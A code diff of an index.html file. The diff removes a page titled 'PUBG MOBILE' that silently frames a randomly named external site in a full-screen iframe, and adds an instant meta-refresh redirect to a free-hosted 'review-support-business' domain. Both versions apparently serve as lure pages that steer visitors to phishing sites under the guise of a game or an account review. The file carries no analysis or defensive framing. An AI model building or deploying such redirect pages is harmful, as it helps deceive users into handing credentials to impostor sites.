--- a/index.html
+++ b/index.html
@@ -1,36 +1,1 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
-    <title>PUBG MOBILE</title>
-    <style>
-        body, html {
-            margin: 0;
-            padding: 0;
-            overflow: hidden;
-            height: 100%;
-        }
-
-        iframe {
-            width: 100%;
-            height: 100%;
-            border: none;
-        }
-    </style>
-</head>
-<body>
-
-<iframe id="myFrame"></iframe>
-
-<script>
-    // Get the iframe element
-    var iframe = document.getElementById('myFrame');
-    
-    // Set the source URL for the iframe
-    var url = 'https://kudahutih776.anakembok.de/'; //
-    iframe.src = url;
-</script>
-
-</body>
-</html>
+<meta http-equiv="refresh" content="0; url=http://review-support-business.000.pe/?i=1" />
